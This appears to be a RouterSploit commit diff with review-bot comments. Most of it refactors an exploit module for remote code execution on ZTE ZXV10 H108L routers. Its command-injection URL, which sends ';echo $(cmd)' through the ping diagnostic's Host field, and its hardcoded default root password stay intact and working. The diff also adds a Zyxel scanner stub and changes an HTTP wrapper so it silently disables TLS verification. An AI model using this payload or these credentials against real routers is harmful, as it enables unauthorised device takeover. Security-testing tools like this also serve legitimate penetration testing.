Commit 20dc0712 by lucyoa
parents a9b6a9e1 99cd1b64
......@@ -10,6 +10,7 @@ from routersploit import (
print_success,
print_status,
shell,
http_request,
)
......@@ -20,7 +21,8 @@ class Exploit(exploits.Exploit):
"""
__info__ = {
'name': 'ZTE ZXV10 RCE',
'description': 'Exploits ZTE ZXV10 H108L remote code execution vulnerability that allows executing commands on operating system level.',
'description': 'Exploits ZTE ZXV10 H108L remote code execution vulnerability '
'that allows executing commands on operating system level.',
'authors': [
'Anastasios Stasinopoulos', # vulnerabiltiy discovery
'Marcin Bury <marcin.bury[at]reverse-shell.com>', # routersploit module
......@@ -39,8 +41,6 @@ class Exploit(exploits.Exploit):
username = exploits.Option('root', 'Username to log in with')
password = exploits.Option('W!n0&oO7.', 'Password to log in with')
session = None
def __init__(self):
self.session = requests.Session()
......@@ -56,14 +56,15 @@ class Exploit(exploits.Exploit):
def execute(self, cmd):
path = "/getpage.gch?pid=1002&nextpage=manager_dev_ping_t.gch&Host=;echo $({})&NumofRepeat=1&DataBlockSize=64&DiagnosticsState=Requested&IF_ACTION=new&IF_IDLE=submit".format(cmd)
path = "/getpage.gch?pid=1002&nextpage=manager_dev_ping_t.gch&Host=;echo $({})&NumofRepeat=1&" \
"DataBlockSize=64&DiagnosticsState=Requested&IF_ACTION=new&IF_IDLE=submit".format(cmd)
url = "{}:{}{}".format(self.target, self.port, path)
try:
response = self.session.get(url)
response = http_request("GET", url, self.session)
time.sleep(3)
url = "{}:{}/getpage.gch?pid=1002&nextpage=manager_dev_ping_t.gch".format(self.target, self.port)
response = self.session.get(url)
response = http_request("GET", url, self.session)
time.sleep(1)
res = re.findall(r'textarea_1">(.*) -c', response.text)
......@@ -87,7 +88,7 @@ class Exploit(exploits.Exploit):
url = "{}:{}/template.gch".format(self.target, self.port)
try:
response = self.session.get(url)
response = http_request("GET", url, self.session)
except:
return
......@@ -115,7 +116,7 @@ class Exploit(exploits.Exploit):
url = "{}:{}/".format(self.target, self.port)
try:
response = self.session.get(url=url)
response = http_request("GET", url, self.session)
if response is None:
return
......@@ -132,7 +133,7 @@ class Exploit(exploits.Exploit):
"Username": self.username,
"Password": self.password}
response = self.session.post(url, data=data)
response = http_request("POST", url, self.session, data=data)
if "Username" not in response.text and "Password" not in response.text:
print_success("Successful authentication")
return True
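Review bot: `response.text` is read straight after `http_request(...)` in the `execute` hunk (the `re.findall` line) and in the login hunk (`if "Username" not in response.text ...`), but the wrapper returns `None` for the request errors it handles, so both reads can now fail with `AttributeError`. Only the hunk at -115 guards with `if response is None: return`. The other call sites should get the same guard, for example `if response is None: return False` before the `"Username"` test in the login code. The `try` blocks in `execute` and around the `template.gch` request close outside the visible hunks, so whether their `except` clauses already absorb this cannot be confirmed from here.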
......
from __future__ import absolute_import
from .autopwn import Exploit as BaseScanner
class Exploit(BaseScanner):
"""
Scanner implementation for Zyxel vulnerabilities.
"""
__info__ = {
'name': 'Zyxel Scanner',
'description': 'Scanner module for Zyxel devices',
'authors': [
'Mariusz Kupidura <f4wkes[at]gmail.com>', # routersploit module
],
'references': (
'',
),
'devices': (
'Zyxel',
),
}
vendor = 'zyxel'
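Review bot: `'references'` holds a single empty string, `('',)`, which any code that lists a module's references would presumably show as a blank entry. An empty tuple, `'references': (),`, carries the same meaning without the placeholder. The scanning behaviour is inherited from `autopwn.Exploit` and is not visible in this file, so the class docstring could say that `vendor = 'zyxel'` is the only thing this subclass changes.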
......@@ -411,14 +411,14 @@ def random_text(length, alph=string.ascii_letters + string.digits):
return ''.join(random.choice(alph) for _ in range(length))
def http_request(method, url, **kwargs):
def http_request(method, url, session=requests, **kwargs):
""" Wrapper for 'requests' silencing exceptions a little bit. """
kwargs.setdefault('timeout', 30.0)
kwargs.setdefault('verify', False)
try:
return getattr(requests, method.lower())(url, **kwargs)
return getattr(session, method.lower())(url, **kwargs)
except (requests.exceptions.MissingSchema, requests.exceptions.InvalidSchema):
print_error("Invalid URL format: {}".format(url))
return
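Review bot: `kwargs.setdefault('verify', False)` now applies to caller-supplied sessions too, and a per-request `verify` argument takes precedence over `Session.verify`. A session configured with certificate verification or a CA bundle therefore has it switched off without the caller asking. The login hunk of the ZTE module sends `Username`/`Password` through this path. Consider applying the default only to the bare module, `if session is requests: kwargs.setdefault('verify', False)`. At the least, the docstring should name the new `session` parameter and the `timeout=30.0` and `verify=False` defaults it imposes. The function body continues past the end of this hunk.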
......